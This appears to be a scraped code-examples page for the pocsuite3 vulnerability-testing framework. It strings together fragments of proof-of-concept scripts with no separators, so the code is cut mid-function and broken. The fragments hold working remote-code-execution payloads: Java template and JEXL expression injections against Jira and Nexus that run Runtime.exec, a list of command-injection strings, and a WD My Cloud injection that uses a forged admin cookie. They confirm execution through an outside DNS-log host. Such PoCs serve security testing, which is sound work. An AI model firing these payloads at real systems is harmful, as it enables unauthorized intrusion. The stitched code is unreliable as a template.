How to use the pocsuite3.api.requests function in pocsuite3
To help you get started, we’ve selected a few pocsuite3 examples, based on popular ways it is used in public projects.
Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
knownsec / pocsuite3 / tests / login_demo.py View on Github 
def _verify(self):
result = {}
payload = "username={0}&password={1}".format(self.get_option("username"), self.get_option("password"))
r = requests.post(self.url, data=payload)
print(r.text)
if r.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Postdata'] = payload
return self.parse_output(result)def _verify(self):
result={}
vul_url = self.url
target_url = vul_url + "/secure/ContactAdministrators.jspa"
headers = {"X-Atlassian-Token": "no-check"}
payload = "$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('ping {0}.{1}').waitFor()".format(self.BANNER, self.DOMAIN)
qparams = (('from','JIRA@JIRA.com'),('subject',payload),('details','details'),('Send','Send'))
try:
req.post(target_url, headers = headers, data = qparams, proxies=self.proxies, verify=False, allow_redirects=False)
except Exception as e:
e.printStackTrace()
time.sleep(2) # 休眠2s等待ceye生成记录
if self.test_dnslog(self.CEYE_URL):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)}
resp = None # 返回的响应
l_auth_headers = self.get_auth_headers()
for auth_header in l_auth_headers:
# 将auth请求头更新到headers中
self.headers.update(auth_header)
# 更新CSRF token
self.headers.update(self.h)
try:
# 发起payload请求
resp = req.post(target_url, json=j, headers=self.headers)#, proxies={'http': 'http://127.0.0.1:8087'})
if self.test_EL(resp): # 验证响应中json的相应字段是否已经执行了EL表达式
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
result['VerifyInfo']['Credentials'] = auth_header
return self.save_output(result)
return self.save_output(result)
except json.decoder.JSONDecodeError as e:
if resp.status_code == 401:
pass
#print("认证失败")
else:
logger.info("json解析失败")
# 失败了可能只是密码错误,继续下一个密码尝试
continue
except Exception as e:},
"recurringDays": [],
"startDate": None,
"timeZoneOffset": "+08:00"
}
],
"type": "rpc",
"tid": 14
}
self.headers.update(self.auth())
self.headers.pop('User-Agent') # 删除默认UA,避免产生CSRF错误
resp = req.post(target_url, json=j, headers=self.headers, proxies=self.proxies)
# 拿到task id
task_id = self.get_task_id(resp)
j2 = {
"action": "coreui_Task",
"method": "run",
"data": [
task_id
],
"type": "rpc",
"tid": 17
}
req.post(target_url, json=j2, headers=self.headers, proxies=self.proxies)headers = {'Referer':''}
j = {
"action":"coreui_Component",
"method":"previewAssets",
"data":[
{"page":1,"start":0,"limit":25,"filter":[
{"property":"repositoryName","value":"*"},
{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping {0}.{1}').waitFor()".format(self.BANNER, self.DOMAIN)},
{"property":"type","value":"jexl"}]
}
],
"type":"rpc","tid":4}
try:
req.post(target_url, json=j, headers=headers, proxies=self.proxies)
except Exception as e:
e.printStackTrace()
time.sleep(2) # 休眠2s等待ceye生成记录
if self.test_dnslog(self.CEYE_URL):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)def _verify(self):
result = {}
veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
cmd = 'cat /proc/cpuinfo'
data = "';{};'".format(cmd)
headers = {'cookie': 'isAdmin=1;username=admin'}
try:
requests.get(veri_url1)
resp = requests.post(veri_url2, data=data, headers=headers)
if any(keyword in resp.text for keyword in ['Processor', 'BogoMIPS', 'Hardware', 'Revision']):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
except Exception as e:
logger.warn(str(e))
return self.parse_verify(result)def _verify(self):
result = {}
veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
cmd = 'cat /proc/cpuinfo'
data = "';{};'".format(cmd)
headers = {'cookie': 'isAdmin=1;username=admin'}
try:
requests.get(veri_url1)
resp = requests.post(veri_url2, data=data, headers=headers)
if any(keyword in resp.text for keyword in ['Processor', 'BogoMIPS', 'Hardware', 'Revision']):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
except Exception as e:
logger.warn(str(e))
return self.parse_verify(result)def test_dnslog(self, url):
resp = req.get(url)
d = resp.json()
try:
name = d['data'][0]['name']
if self.BANNER in name:
return True
except Exception:
return Falsel_payload = [
"ping {0}.{1}",
"ping {0}.{1} & /createrepo",
"ping {0}.{1} ; /createrepo",
"ping {0}.{1} | /createrepo",
"ping {0}.{1} || /createrepo",
]
vul_url = self.get_vul_url(capa_id_url, headers)
target_url = vul_url
try:
for i in range(len(l_payload)):
json_payload = self.get_json_payload(l_payload[i])
req.put(target_url, json=json_payload, headers=headers, proxies=self.proxies)
except Exception as e:
e.printStackTrace()
time.sleep(2) # 休眠2s等待ceye生成记录
if self.test_dnslog(self.CEYE_URL):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)"type":"rpc","tid":4}
resp = None # 返回的响应
l_auth_headers = self.get_auth_headers()
for auth_header in l_auth_headers:
# 将auth请求头更新到headers中
self.headers.update(auth_header)
# 更新CSRF token
self.headers.update(self.h)
try:
# 发起payload请求
resp = req.post(target_url, json=j, headers=self.headers)#, proxies={'http': 'http://127.0.0.1:8087'})
if self.test_EL(resp): # 验证响应中json的相应字段是否已经执行了EL表达式
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except json.decoder.JSONDecodeError as e:
if resp.status_code == 401:
pass
#print("认证失败")
else:
logger.info("json解析失败")
# 失败了可能只是密码错误,继续下一个密码尝试
continue
except Exception as e:
logger.error(e)pocsuite3
Open-sourced remote vulnerability testing framework.
Package Health Score
78 / 100Popular pocsuite3 functions
- pocsuite3.api.logger
- pocsuite3.api.logger.info
- pocsuite3.api.Output
- pocsuite3.api.POC_CATEGORY
- pocsuite3.api.POCBase
- pocsuite3.api.register_poc
- pocsuite3.api.requests
- pocsuite3.api.requests.get
- pocsuite3.api.requests.post
- pocsuite3.api.VUL_TYPE
- pocsuite3.lib.core.common.data_to_stdout
- pocsuite3.lib.core.data.conf
- pocsuite3.lib.core.data.kb
- pocsuite3.lib.core.data.logger
- pocsuite3.lib.core.data.logger.debug
- pocsuite3.lib.core.data.logger.error
- pocsuite3.lib.core.data.logger.info
- pocsuite3.lib.core.data.paths
- pocsuite3.lib.core.datatype.AttribDict
- pocsuite3.lib.request.requests.get